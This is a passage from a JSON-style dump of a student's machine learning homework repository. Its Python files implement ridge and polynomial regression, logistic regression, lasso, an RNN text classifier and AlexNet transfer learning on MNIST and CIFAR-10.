reg_lambda_l[-1])\nplt.xscale(\"log\")\nplt.legend()\nplt.savefig(\"A5b\")\nplt.show()\n\n\n# In[77]:\n\n\n\nplt.plot(reg_lambda_l[1:], squared_train_err_l[1:], label = \"train\")\nplt.plot(reg_lambda_l[1:], squared_test_err_l[1:], label = \"test\")\nplt.xlim(reg_lambda_l[0], reg_lambda_l[-1]) # flip x axis\nplt.xlabel(\"lambda\")\nplt.ylabel(\"squared error\")\nplt.xscale(\"log\")\nplt.legend()\nplt.savefig(\"A5c\")\nplt.show()\n\n"
},
{
"alpha_fraction": 0.614313006401062,
"alphanum_fraction": 0.6353455185890198,
"avg_line_length": 28.516128540039062,
"blob_id": "4a932d9f0199811d42acba62f3459b3bccb3683b",
"content_id": "258d81f6f219a4c646f1029e034e4aca481d7a0a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3661,
"license_type": "no_license",
"max_line_length": 125,
"num_lines": 124,
"path": "/CSE546hw2/binary_logistic_reg_GD.py",
"repo_name": "feipenghe/ml_hw",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[20]:\n\n\nfrom mnist import MNIST\nimport numpy as np\ndef load_dataset():\n mndata = MNIST(\"./data/python-mnist/data/\")\n \n X_train, labels_train = map(np.array, mndata.load_training())\n kept_entries_pos1 = (labels_train == 2) + (labels_train == 7)\n X_train = X_train[kept_entries_pos1]\n labels_train = labels_train[kept_entries_pos1]\n labels_train = labels_train.astype(int)\n labels_train[labels_train == 7] = 1\n labels_train[labels_train == 2] = -1\n\n \n \n X_test, labels_test = map(np.array, mndata.load_testing())\n kept_entries_pos2 = (labels_test == 2) + (labels_test == 7)\n X_test = X_test[kept_entries_pos2]\n labels_test = labels_test[kept_entries_pos2]\n labels_test = labels_test.astype(int)\n labels_test[labels_test == 7] = 1\n labels_test[labels_test == 2] = -1\n # normalization to [0,1]\n X_train = X_train/255.0 \n X_test = X_test/255.0\n return X_train, labels_train, X_test, labels_test\nX_train, labels_train, X_test, labels_test = load_dataset()\n\n\n# In[21]:\n\n\n##### import math\nn, d= X_train.shape\n\nm = X_test.shape[0]\n\n# w = np.zeros(d)\nnew_w = np.zeros(d)\nw_gradient = np.zeros(d)\n# b = 0\nnew_b = 0\nb_gradient = 0\nlearning_rate = 0.001\n\nreg_lambda = 0.1\n\nloss_on_training = []\nloss_on_testing = []\n\nloss_sum = 0\n\nmisclass_on_training = []\nmisclass_on_testing = []\n\n\n\n# TODO: while not converge\ncount = 0\nmetStopCondition = False\nwhile not metStopCondition:\n w = np.copy(new_w)\n b = np.copy(new_b)\n \n y_pred = b + X_train.dot(w)\n u = 1/(1+ np.exp(-labels_train*(y_pred)))\n w_gradient = (1/n)*np.sum((1-u)*(-labels_train*X_train.T), axis = 1) + 2*reg_lambda*w\n\n b_gradient = (1/n)*np.sum((1-u)*(-labels_train))\n \n # gradient descent update on the whole dataset, therefore we don't have to update each step\n new_w -= w_gradient * learning_rate\n new_b -= b_gradient * learning_rate\n \n training_loss = (1/n) * np.sum( np.log(1+ np.exp(-labels_train*(b+X_train.dot(w)) )) + reg_lambda * np.linalg.norm(w, 2))\n loss_on_training.append(training_loss)\n testing_loss = (1/m) * np.sum( np.log(1+ np.exp(-labels_test*(b+X_test.dot(w)) )) + reg_lambda * np.linalg.norm(w, 2))\n loss_on_testing.append(testing_loss)\n \n num_incor_class_training = np.sum( labels_train !=( np.sign(b+ X_train.dot(w) ) ) ) \n num_incor_class_testing = np.sum( labels_test != ( np.sign(b + X_test.dot(w) ) ))\n# print(\"num_incor_class_training: \", num_incor_class_training)\n misclass_on_training.append( num_incor_class_training /n )\n misclass_on_testing.append(num_incor_class_testing/m)\n# print(new_w)\n# print(w)\n# break\n \n # Stop condition check\n # 1e-4\n metStopCondition = new_b - b < 1e-4 and np.linalg.norm(new_w - w, 2) < 1e-4\n# print(\"new_b - b\", new_b - b)\n# print(\"np.linalg.norm(new_w - w, 2) \", np.linalg.norm(new_w - w, 2) )\n# print(\"loss: \", loss_on_training[-1])\n\n\n# In[22]:\n\n\nfrom matplotlib import pyplot as plt\n\nplt.plot(range(len(loss_on_training)), loss_on_training, label = \"training loss\")\nplt.plot(range(len(loss_on_training)), loss_on_testing, label = \"testing loss\")\nplt.xlabel(\"number of iteration\")\nplt.ylabel(\"loss\")\nplt.legend()\n# plt.show()\nplt.savefig(\"A6b(i)\")\nplt.show()\n\n\nplt.plot(range( len(misclass_on_training)-1), misclass_on_training[1:], label = \"misclassification rate on training dataset\")\nplt.plot(range(len(misclass_on_training)-1), misclass_on_testing[1:], label = \"misclassification rate on test dataset\")\nplt.xlabel(\"number of iteration\")\nplt.ylabel(\"misclassification rate\")\nplt.legend()\nplt.savefig(\"A6b(ii)\")\nplt.show()\n\n"
},
{
"alpha_fraction": 0.49978241324424744,
"alphanum_fraction": 0.5119669437408447,
"avg_line_length": 28.461538314819336,
"blob_id": "817d8cd87d5c1ecdc73fa44d710551c14399f8b5",
"content_id": "c681b4aede14057b6e37056b8ee3bf9b4e3275e1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4596,
"license_type": "no_license",
"max_line_length": 131,
"num_lines": 156,
"path": "/hw1/code/polyreg.py",
"repo_name": "feipenghe/ml_hw",
"src_encoding": "UTF-8",
"text": "'''\n Template for polynomial regression\n AUTHOR Eric Eaton, Xiaoxiang Hu\n'''\n\nimport numpy as np\nimport math\n\n#-----------------------------------------------------------------\n# Class PolynomialRegression\n#-----------------------------------------------------------------\n\nclass PolynomialRegression:\n\n def __init__(self, degree=1, reg_lambda=1e-6):\n \"\"\"\n Constructor\n \"\"\"\n #TODO\n self.degree = degree\n self.reg_lambda = reg_lambda\n self.theta = None\n self.featureMean = None\n self.featureStd= None\n\n def polyfeatures(self, X, degree):\n \"\"\"\n Expands the given X into an n * d array of polynomial features of\n degree d.\n\n Returns:\n A n-by-d numpy array, with each row comprising of\n X, X * X, X ** 3, ... up to the dth power of X.\n Note that the returned matrix will not include the zero-th power.\n\n Arguments:\n X is an n-by-1 column numpy array\n degree is a positive integer\n \"\"\"\n #TODO\n n = X.shape[0]\n zero_matrix = np.zeros((n, degree))\n zero_matrix[:, 0] = X.reshape(n)\n X = zero_matrix\n for d in range(1, degree + 1):\n X[:, d - 1] = np.power(X[:, 0], d)\n return X\n\n\n\n def fit(self, X, y):\n \"\"\"\n Trains the model\n Arguments:\n X is a n-by-1 array\n y is an n-by-1 array\n Returns:\n No return value\n Note:\n You need to apply polynomial expansion and scaling\n at first\n \"\"\"\n #TODO\n X = self.polyfeatures(X, self.degree)\n self.featureMean = X.mean(axis = 0)\n self.featureStd = np.std(X,axis = 0)\n\n # data standarzation\n X = (X - self.featureMean)/ self.featureStd\n\n\n # old\n # add 1s column\n n = len(X)\n X_ = np.c_[np.ones([n, 1]), X]\n\n n, d = X_.shape\n d = d-1 # remove 1 for the extra column of ones we added to get the original num features\n\n # construct reg matrix\n reg_matrix = self.reg_lambda * np.eye(d + 1)\n reg_matrix[0, 0] = 0\n\n # analytical solution (X'X + regMatrix)^-1 X' y\n self.theta = np.linalg.pinv(X_.T.dot(X_) + reg_matrix).dot(X_.T).dot(y)\n\n\n def predict(self, X):\n \"\"\"\n Use the trained model to predict values for each instance in X\n Arguments:\n X is a n-by-1 numpy array\n Returns:\n an n-by-1 numpy array of the predictions\n \"\"\"\n # TODO\n # standardize data\n X = self.polyfeatures(X, self.degree)\n X = (X - self.featureMean) / self.featureStd\n\n\n # copied code\n n = len(X)\n\n # add 1s column\n X_ = np.c_[np.ones([n, 1]), X]\n print(\"reg_lambda: \", self.reg_lambda, \" model theta L2 norm: \", np.linalg.norm(self.theta, 2))\n return X_.dot(self.theta)\n\n#-----------------------------------------------------------------\n# End of Class PolynomialRegression\n#-----------------------------------------------------------------\n\n\n\ndef learningCurve(Xtrain, Ytrain, Xtest, Ytest, reg_lambda, degree):\n \"\"\"\n Compute learning curve\n\n Arguments:\n Xtrain -- Training X, n-by-1 matrix\n Ytrain -- Training y, n-by-1 matrix\n Xtest -- Testing X, m-by-1 matrix\n Ytest -- Testing Y, m-by-1 matrix\n regLambda -- regularization factor\n degree -- polynomial degree\n\n Returns:\n errorTrain -- errorTrain[i] is the training accuracy using\n model trained by Xtrain[0:(i+1)]\n errorTest -- errorTrain[i] is the testing accuracy using\n model trained by Xtrain[0:(i+1)]\n\n Note:\n errorTrain[0:1] and errorTest[0:1] won't actually matter, since we start displaying the learning curve at n = 2 (or higher)\n \"\"\"\n\n n = len(Xtrain)\n m = len(Xtest)\n\n errorTrain = np.zeros(n)\n errorTest = np.zeros(n)\n\n #TODO -- complete rest of method; errorTrain and errorTest are already the correct shape\n\n for i in range(n):\n if i < 3: # ignore the zero-th case\n errorTrain[i] = 0\n errorTest[i] = 0\n else:\n model = PolynomialRegression(degree, reg_lambda)\n model.fit(Xtrain[:i+1], Ytrain[:i+1]) # i = 3, model training on sample 0,1,2\n errorTrain[i] =(1/i) * np.sum((Ytrain[:i] - model.predict(Xtrain[:i])) ** 2)\n errorTest[i] = (1/m) * np.sum((Ytest - model.predict(Xtest)) ** 2)\n\n return errorTrain, errorTest\n"
},
{
"alpha_fraction": 0.5467332005500793,
"alphanum_fraction": 0.5685117840766907,
"avg_line_length": 20.086124420166016,
"blob_id": "bc930937908a6390256aa2ec6d2207f24d121842",
"content_id": "19c14eea60c6054729a3a0825e5e3b57e94af9d2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4408,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 209,
"path": "/CSE546hw2/lasso.py",
"repo_name": "feipenghe/ml_hw",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[9]:\n\n\nimport sys\nimport numpy as np\n\n\n# In[10]:\n\n\n# TODO: is the 0 weights random or just with index larger than k\nn = 500\nd = 1000\nk = 100\nsigma = 1\n\n\ntrain_x = np.random.normal(0,1, (n,d))\n\n\n# use two np arange?\nnon_empty_weights = np.arange(k)\n# w = np.zeros(d) # initial weights ready for training\ntrue_w = np.zeros(d)\ntrue_w[non_empty_weights] = 1 # it's only for generating data\nw = np.zeros(d)\nprint(w.shape)\n\ntrain_y = train_x.dot(true_w) + np.random.normal(0,1, n)\n\nprint(train_x)\nprint(train_y)\n\n\n# In[31]:\n\n\na = np.array([0.0])\n\nnp.count_nonzero(a)\n\n\n# In[48]:\n\n\n# TODO: regularization path\n# it updates values column by column and each time use all data\n\n\nreg_lambda_l = []\n# initialize lambda\nfor k in range(d):\n reg_lambda = 2*np.abs(np.sum(train_x[:,k] *(train_y-np.average(train_y)) ,axis=0))\n reg_lambda_l.append(reg_lambda)\nreg_lambda = max(reg_lambda_l)\n\nprint(\"max_lambda: \", reg_lambda)\n\n\nnum_nonzero_l = []\nreg_lambda_l = []\nreg_lambda_l.append(reg_lambda)\n\nobjective_val_l = []\n\nFDR_l = []\nTPR_l = []\ntrue_k = 100\n\n\nw_updates = [np.zeros(d)] # initialize how much w_updates\nw_prev = np.zeros(d)\nb_l = [(1/n)*np.sum( train_y - train_x.dot(w))]\nwhile reg_lambda > 1e-2: # TODO\n max_update = sys.maxsize\n# # for each lambda solution, compute w from zero vector\n# w_prev = np.zeros(d)\n w = w_updates[-1]\n w = w_prev\n b = b_l[-1]\n \n count = 0\n \n while max_update >= 0.05: # condition for not converge\n # pre-compute a\n # as a is fixed and solely depends on X\n a = 2*np.sum(train_x**2, axis = 0) # axis = 0 by default\n # print(a.shape)\n for k in range(d):\n excluded_train_x = np.delete(train_x, k, axis = 1)\n excluded_w = np.delete(w, k)\n # calculate the cost\n c_k = 2*np.sum(train_x[:,k]*(train_y- (b+ excluded_train_x.dot(excluded_w)) ) )\n # update weights\n if c_k < -reg_lambda:\n w[k]= (c_k+reg_lambda)/a[k]\n elif c_k > reg_lambda:\n w[k] = (c_k- reg_lambda)/a[k]\n else:\n w[k] = 0\n \n # sanity check\n obj_val = np.sum( (train_x.dot(w) + b - train_y)**2 )+ np.sum(reg_lambda * np.absolute(w))\n objective_val_l.append(obj_val)\n \n w_updates.append(np.array(w)) # append the updated w\n b = (1/n)*np.sum( train_y - train_x.dot(w))\n b_l.append(b)\n\n if len(w_updates) > 2: # TODO: maximum \n print(\"w_updates \", len(w_updates))\n max_update = np.max(w_updates[-1]-w_updates[-2])\n print(\"maximum update \", max_update)\n if max_update == 0: # skip zero weight matrix\n break\n w_prev = w\n# correct_num_nonzero = np.sum((w != 0) * (true_w != 0))\n k = 100\n correct_num_nonzero = np.sum( w[:k] != 0)\n \n# print(\"w: \", w)\n# print(\"true_w\", true_w)\n print(\"correct_num_nonzero: \", correct_num_nonzero)\n count += 1\n if count >= 10:\n break\n \n incor_num_nonzero = np.sum( w[k:] != 0 )\n \n # keep track of number of nonzero for each solution\n num_nonzero = np.sum(w != 0)\n num_nonzero_l.append(num_nonzero)\n # FDR\n if num_nonzero == 0:\n # invalid number of nonzero\n FDR_l.append(0.0)\n else:\n FDR_l.append(incor_num_nonzero/num_nonzero)\n # TPR\n TPR_l.append(correct_num_nonzero/true_k)\n \n# print(\"FDR_l \", FDR_l)\n# print(\"TPR_l: \", TPR_l)\n# break\n \n # regularization lambda\n reg_lambda = reg_lambda*0.5\n reg_lambda_l.append(reg_lambda)\n print(\"new lambda: \", reg_lambda)\n\n\n# In[13]:\n\n\n# sanity check continue\ncount = 0\nfor i in range(1,len(objective_val_l)):\n if objective_val_l[i-1] < objective_val_l[i]:\n count += 1\nprint(\"number of wrong optimization: \" , count)\nprint(objective_val_l)\n\n\n# In[22]:\n\n\nfrom matplotlib import pyplot as plt\nreg_lambda_0 = max(reg_lambda_l)\nplt.plot(reg_lambda_l[:-1], num_nonzero_l)\nplt.xscale(\"log\")\n# plt.xlim(reg_lambda_0, 1e-2) \nplt.xlim(1e-2, reg_lambda_0) \nplt.xlabel(\"reg_lambda\")\nplt.ylabel(\"number of nonzero\")\nplt.savefig(\"A4a\")\nplt.show()\n\n\n# In[42]:\n\n\nlen(w_updates)\n\n\n# In[16]:\n\n\nprint(reg_lambda_l)\n\n\n# In[45]:\n\n\nprint(FDR_l)\n\nprint(TPR_l)\n\n\n# In[49]:\n\n\nplt.plot(FDR_l, TPR_l)\nplt.xlabel(\"FDR\")\nplt.ylabel(\"TPR\")\nplt.savefig(\"A4b\")\nplt.show()\n\n"
},
{
"alpha_fraction": 0.6178369522094727,
"alphanum_fraction": 0.6311541795730591,
"avg_line_length": 38.02362060546875,
"blob_id": "1b0f8fd7bcbe1e0135ef51f73bf1a21c5a2d02cb",
"content_id": "e1291be963ca165c8325b0150b223d4a07e8eba9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4956,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 127,
"path": "/hw4/a6_RNN/hw4_a6.py",
"repo_name": "feipenghe/ml_hw",
"src_encoding": "UTF-8",
"text": "import torch\nimport torch.nn as nn\nfrom docutils.nodes import target\n\n\ndef tuple2tensor(tuple):\n tensor = None\n for t in tuple:\n if tensor == None:\n tensor = torch.unsqueeze(t, dim=0)\n else:\n t = torch.unsqueeze(t, dim=0)\n tensor = torch.cat((tensor, t), dim=0)\n return tensor\n\ndef collate_fn(batch):\n \"\"\"\n Create a batch of data given a list of N sequences and labels. Sequences are stacked into a single tensor\n of shape (N, max_sequence_length), where max_sequence_length is the maximum length of any sequence in the\n batch. Sequences shorter than this length should be filled up with 0's. Also returns a tensor of shape (N, 1)\n containing the label of each sequence.\n\n :param batch: A list of size N, where each element is a tuple containing a sequence tensor and a single item\n tensor containing the true label of the sequence.\n\n :return: A tuple containing two tensors. The first tensor has shape (N, max_sequence_length) and contains all\n sequences. Sequences shorter than max_sequence_length are padded with 0s at the end. The second tensor\n has shape (N, 1) and contains all labels.\n \"\"\"\n sentences, labels = zip(*batch)\n\n # get maximum number of sequence length\n max_sequence_length = -1\n for sent in sentences:\n temp_len = sent.shape[0]\n if temp_len > max_sequence_length:\n max_sequence_length = temp_len\n pad_t = torch.tensor([0])\n padded_sents = []\n # print(max_sequence_length)\n t1 = None\n t2 = labels\n for i in range(len(sentences)): # pad each sent\n cur_sent_t = sentences[i]\n num_pad = max_sequence_length - cur_sent_t.shape[0]\n padded_t = torch.cat( (cur_sent_t, pad_t.repeat(num_pad) ) )\n if t1 is None:\n t1 = torch.unsqueeze(padded_t, 0)\n else:\n\n padded_t = torch.unsqueeze(padded_t, 0)\n # print(\"t1 shape \", t1.shape)\n # print(\"padded_t shape \", padded_t.shape)\n t1 = torch.cat( (t1, padded_t), dim = 0 )\n t2 = tuple2tensor(t2)\n return t1, t2\n\n\nclass RNNBinaryClassificationModel(nn.Module):\n def __init__(self, embedding_matrix):\n super().__init__()\n\n vocab_size = embedding_matrix.shape[0]\n embedding_dim = embedding_matrix.shape[1]\n # Construct embedding layer and initialize with given embedding matrix. Do not modify this code.\n self.embedding = nn.Embedding(num_embeddings=vocab_size, embedding_dim=embedding_dim, padding_idx=0)\n self.embedding.weight.data = embedding_matrix\n\n self.output_size = 1\n self.hidden_dim = 64\n self.n_layers = 1\n # self.N = 50 # N is number of sequences which are batch size\n self.rnn = nn.RNN(input_size=embedding_dim, hidden_size=self.hidden_dim, num_layers=self.n_layers, batch_first = True)\n self.fc = nn.Linear(self.hidden_dim, self.output_size)\n self.criterion = nn.BCELoss()\n self.sm = nn.Sigmoid()\n\n def forward(self, inputs):\n \"\"\"\n Takes in a batch of data of shape (N, max_sequence_length). Returns a tensor of shape (N, 1), where each\n element corresponds to the prediction for the corresponding sequence.\n :param inputs: Tensor of shape (N, max_sequence_length) containing N sequences to make predictions for.\n :return: Tensor of predictions for each sequence of shape (N, 1).\n \"\"\"\n # inputs -> embedding\n embedding_input = self.embedding(inputs) # inputs shape 2 x 30\n\n batch_size = embedding_input.size(0)\n _, hidden= self.rnn(embedding_input) # GRU or GPU\n # _, (hidden, _) = self.rnn(embedding_input) # output 2 x max_seq_length x 64 # LSTM\n hidden = torch.squeeze(hidden)\n out = self.fc(hidden)\n out = self.sm(out)\n return out\n\n def loss(self, logits, targets):\n \"\"\"\n Computes the binary cross-entropy loss.\n :param logits: Raw predictions from the model of shape (N, 1)\n :param targets: True labels of shape (N, 1)\n :return: Binary cross entropy loss between logits and targets as a scalar tensor.\n \"\"\"\n return self.criterion(logits, targets.float())\n\n\n def accuracy(self, logits, targets):\n \"\"\"\n Computes the accuracy, i.e number of correct predictions / N.\n :param logits: Raw predictions from the model of shape (N, 1)\n :param targets: True labels of shape (N, 1)\n :return: Accuracy as a scalar tensor.\n \"\"\"\n num_correct = 0\n for i in range(len(logits)):\n pred = torch.round(logits[i])\n if pred == targets[i]:\n num_correct += 1\n return torch.tensor(num_correct*1.0/len(logits))\n\n\n# Training parameters\nTRAINING_BATCH_SIZE = 32\nNUM_EPOCHS = 5\nLEARNING_RATE = 5e-5 # 0.001 acc went down\n\n# Batch size for validation, this only affects performance.\nVAL_BATCH_SIZE = 128\n"
},
{
"alpha_fraction": 0.5935471057891846,
"alphanum_fraction": 0.6063348650932312,
"avg_line_length": 31.33121109008789,
"blob_id": "536dfe6f27fed3984313f55d81f5cd24a814d5aa",
"content_id": "f067d6a856ba75859939db6c2984ed0def3e7407",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5083,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 157,
"path": "/hw1/ridgeRegression/imageClassify2.py",
"repo_name": "feipenghe/ml_hw",
"src_encoding": "UTF-8",
"text": "\nfrom mnist import MNIST\nimport numpy as np\nimport math\nfrom matplotlib import pyplot as plt\n\nclass ImageClassification:\n\n\n def __init__(self, p = 100, reg_lambda = 1e-4):\n self.p = p\n self.reg_lambda = reg_lambda\n self.G = None\n self.b = None\n self.W = None\n\n def train(self, X, X_labels, reg_lambda=0):\n # TODO: polyfeature + normalization?\n # X = self.pFeature(X)\n n = X.shape[1]\n Y = np.eye(10)[X_labels]\n\n # analytical solution\n self.W = np.linalg.pinv(X.T.dot(X) + np.multiply(self.reg_lambda, np.eye(n))).dot(X.T).dot(Y)\n\n\n\n def predict(self, h):\n predictions = np.eye(10).T.dot(self.W.T).dot(h.T)\n return predictions\n\n\n\n def pFeature(self, X_train, X_test, new=True):\n train_idx = len(X_train)\n X = np.concatenate( (X_train, X_test), axis = 0)\n n, d = X.shape\n if new:\n # if self.G is None:\n self.G = np.random.normal(0, 0.3162, size=(self.p, d)) # sigma^2 = 0.1, tae a approximate value here\n # if self.b is None:\n self.b = np.random.uniform(0, math.pi, size=(n, self.p))\n h = np.cos(X.dot(self.G.T) + self.b)\n h_train = h[:train_idx]\n h_test = h[train_idx:]\n return h_train, h_test\n\n\n\n\ndef load_dataset():\n mndata = MNIST(\"./python-mnist/data/\")\n X_train, labels_train = map(np.array, mndata.load_training())\n X_test, labels_test = map(np.array, mndata.load_testing())\n X_train = X_train / 255.0\n X_test = X_test / 255.0\n return X_train, labels_train, X_test, labels_test\n\n\n\ndef plotLearningCurve(errorTrain, errorTest, ps, regLambda):\n \"\"\"\n plot computed learning curve\n \"\"\"\n minX = 0\n maxY = max(errorTest)\n\n xs = np.arange(len(errorTrain))\n plt.plot(ps, errorTrain, 'r-o')\n plt.plot(ps, errorTest, 'b-o')\n plt.plot(ps, np.ones(len(xs)), 'k--')\n plt.legend(['Training Error', 'Validation Error'], loc='best')\n plt.title('Learning Curve (lambda='+str(regLambda)+')')\n plt.xlabel('p value')\n plt.ylabel('Error')\n plt.yscale('log')\n plt.ylim(top=maxY)\n # plt.xlim((minX, 10))\n plt.show()\n\n\ndef splitTrainValidation(X, X_labels):\n n = len(X)\n indices = np.random.permutation(n)\n training_idx_num = int(n * 0.8)\n training_idx, validation_idx = indices[:training_idx_num], indices[training_idx_num:]\n training_data = X[training_idx, :]\n training_labels = X_labels[training_idx]\n val_data = X[validation_idx, :]\n val_labels = X_labels[validation_idx]\n return training_data, training_labels, val_data, val_labels\n\ndef hoeffding( num_samples, num_correct, a= 0, b= 1, delta = 0.05):\n rhs = math.sqrt( (b-a)**2*math.log(2/delta, math.e)/(2* num_samples) )\n mu_conf_interval = ( -rhs+test_error , rhs+test_error )\n return mu_conf_interval\n\n\nif __name__ == '__main__':\n\n\n X_train, labels_train, X_test, labels_test = load_dataset()\n\n ps = np.arange(500,3000, 500) # p values\n train_errors = np.zeros(len(ps)) # training error place holder\n val_errors = np.zeros(len(ps))\n idx = 0\n reg_lambda = 1e-4\n\n models = []\n\n\n # for loop\n for p in ps:\n model = ImageClassification(p)\n # feature transform, each model create a new p feature\n X_train_h, X_test_p = model.pFeature(X_train, X_test) # when transform features\n # split train and validation dataset\n X_train_h, labels_train_h, X_val_h, val_labels = splitTrainValidation(X_train_h, labels_train)\n\n\n w = model.train(X_train_h, labels_train_h, reg_lambda)\n\n\n # training error\n prediction_train = model.predict(X_train_h)\n prediction_train = np.argmax(prediction_train, axis=0)\n train_errors[idx] = 1 - np.sum(labels_train_h == np.array(prediction_train)) / len(labels_train_h)\n print(\"Train error: \", 1 - np.sum(labels_train_h == np.array(prediction_train)) / len(labels_train_h))\n\n\n # validation error\n prediction_val = model.predict(X_val_h)\n prediction_val = np.argmax(prediction_val, axis=0)\n val_errors[idx] = 1 - np.sum(val_labels == np.array(prediction_val)) / len(val_labels)\n print(\"Validation error: \", 1 - np.sum(val_labels == np.array(prediction_val)) / len(val_labels))\n\n\n\n idx += 1\n print(\"Training progress: \", idx, \"/\", len(ps), \" current p value:\", p)\n print(\"\")\n models.append(model)\n\n plotLearningCurve(train_errors, val_errors, ps, reg_lambda)\n\n print(\"best model index: \", np.argmin(val_errors))\n best_model = models[np.argmin(val_errors)]\n\n\n _, h_test = best_model.pFeature(X_train, X_test, new=False)\n prediction_test = best_model.predict(h_test)\n prediction_test = np.argmax(prediction_test, axis=0)\n test_error = 1 - np.sum(labels_test == np.array(prediction_test)) / len(labels_test)\n num_samples = len(X_test)\n num_correct = np.sum(labels_test == np.array(prediction_test))\n print(\"Test error : \", test_error)\n print(\"Confidence interval: \", hoeffding(num_samples, test_error))\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.5992537140846252,
"alphanum_fraction": 0.6177611947059631,
"avg_line_length": 40.35185241699219,
"blob_id": "82bbc2f34f14cf6d43b396806eea452a3c4dddf7",
"content_id": "e15ec6da4415ec9dc6da65b9a5be61942e9daa1f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6700,
"license_type": "no_license",
"max_line_length": 154,
"num_lines": 162,
"path": "/hw4/a4_transfer_learning/A4test.py",
"repo_name": "feipenghe/ml_hw",
"src_encoding": "UTF-8",
"text": "#%%\n\nimport torch\nimport torchvision\nimport torchvision.models as models\nimport torchvision.transforms as transforms\nfrom torch import nn\nfrom torch.utils.data.sampler import SubsetRandomSampler\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport copy\n#%%\ndef train(model, train_loader, val_loader, split , gpu, lr = 1e-4, num_epochs = 20, criterion = nn.CrossEntropyLoss()):\n from tqdm import tqdm\n torch.cuda.set_device(gpu)\n model = model.cuda(gpu)\n # model = torch.nn.DataParallel(model).cuda(0)\n optimizer = torch.optim.Adam(model.parameters(), lr)\n log_train_loss = []\n log_val_loss = []\n log_val_acc = []\n for epoch in tqdm(range(num_epochs)):\n # training\n model.train() # if using batchnorm or dropout, use train mode setting! don't want to adjust normalization on non-train data\n epoch_train_loss = 0\n for batch_idx, (input, target) in enumerate(train_loader):\n input = input.cuda(gpu, non_blocking=True) # move to device and zero optimizer\n target = target.cuda(gpu, non_blocking=True)\n optimizer.zero_grad()\n ### train step ###\n output = model(input) # forward\n loss = criterion(output, target)\n ### end train step ###\n ### backward pass and optim step ###\n loss.backward()\n optimizer.step()\n ### logging\n epoch_train_loss += loss\n log_train_loss.append(epoch_train_loss / (batch_idx + 1))\n\n # evaluation\n model.eval() # set batchnorm + dropout in eval so it doesn't adjust on validation data\n with torch.no_grad(): # turn off gradients\n epoch_val_loss = 0\n num_correct = 0\n highest_val_acc = 0\n highest_val_acc_model = None\n for batch_idx, (input, target) in enumerate(val_loader):\n # do the same steps for train step as for val step but skip updates and backward pass (no gradients)\n input = input.cuda(gpu, non_blocking=True)\n target = target.cuda(gpu, non_blocking=True)\n # log val loss every val step\n output = model(input)\n loss = criterion(output, target)\n epoch_val_loss += loss\n # validation accuracy\n num_correct_per_batch = torch.sum(target == torch.argmax(output, axis=1))\n num_correct += num_correct_per_batch\n val_accuracy = num_correct.item() / split\n log_val_acc.append(val_accuracy)\n print(\"validation accuracy: \", val_accuracy)\n if val_accuracy > highest_val_acc:\n highest_val_acc = val_accuracy\n highest_val_acc_model = copy.deepcopy(model)\n log_val_loss.append(epoch_val_loss / (batch_idx + 1)) # average the loss\n return highest_val_acc_model, log_train_loss, log_val_loss, log_val_acc\n\ndef import_dataset():\n transform = transforms.Compose([\n transforms.Resize(224),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),\n ])\n train = torchvision.datasets.CIFAR10(\".\", train = True, transform = transform)\n val = torchvision.datasets.CIFAR10(\".\", train = True, transform = transform)\n test = torchvision.datasets.CIFAR10(\".\", train = False, transform = transform)\n return train, val, test\n#%% Data loader\n\ndef fixed_feature_alexnet():\n # model\n model = models.alexnet(pretrained=True)\n for param in model.parameters():\n param.require_grad = False\n model.classifier[6] = nn.Linear(4096, 10)\n return model\n\n#%%\n\n\n#%% Train vs Validation\ndef eval_test_acc(model, M, test_loader, gpu):\n num_correct = 0\n with torch.no_grad():\n for batch_idx, (input, target) in enumerate(test_loader):\n input = input.cuda(gpu, non_blocking= True)\n target = target.cuda(gpu, non_blocking= True)\n output = model(input)\n num_correct_per_batch = torch.sum(target == torch.argmax(output, axis=1))\n num_correct += num_correct_per_batch\n return num_correct.item()/M\n\ndef report(name, loss1, loss2, val_acc_l, test_acc):\n plt.plot(loss1, label = \"Train Loss\")\n plt.plot(loss2, label = \"Validation loss\")\n plt.xlabel(\"epoch\")\n plt.ylabel(\"loss\")\n plt.legend()\n plt.savefig(name)\n fname = name + \".txt\"\n with open(fname, \"w\") as f:\n txt = \"Highest validation accuracy: \" + str(max(val_acc_l)) + \"\\n\"\n txt += \"Final test accuracy: \" + str(test_acc)\n f.write(txt)\n\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--model\", type=int, default=1, help=\"1 is transfer learning, 2 is fine tuning\")\n parser.add_argument(\"--num_epochs\", type=int, default=20)\n parser.add_argument(\"--gpu\", type=int, default=0)\n args = parser.parse_args()\n\n\n CIFAR10_train, CIFAR10_val, CIFAR10_test = import_dataset()\n\n val_ratio = 0.1\n N = len(CIFAR10_train)\n M = len(CIFAR10_test)\n np.random.seed(10)\n idx = np.random.randint(0, N, size = N)\n split = int(N * val_ratio)\n train_idx, val_idx = idx[split:], idx[:split]\n train_sampler = SubsetRandomSampler(train_idx)\n val_sampler = SubsetRandomSampler(val_idx)\n\n num_of_classes = 10\n lr = 0.05\n batch_size = 32\n criterion = nn.CrossEntropyLoss()\n\n val_ratio = 0.1 #\n train_loader = torch.utils.data.DataLoader(CIFAR10_train, batch_size = batch_size, sampler = train_sampler)\n val_loader = torch.utils.data.DataLoader(CIFAR10_train, batch_size = batch_size, sampler = val_sampler)\n test_loader = torch.utils.data.DataLoader(CIFAR10_test, batch_size = 100)\n\n if args.model == 1:\n model1 = fixed_feature_alexnet()\n model1, log_train_loss1, log_val_loss1, log_val_acc1 = train(model1, train_loader, val_loader, split, gpu = 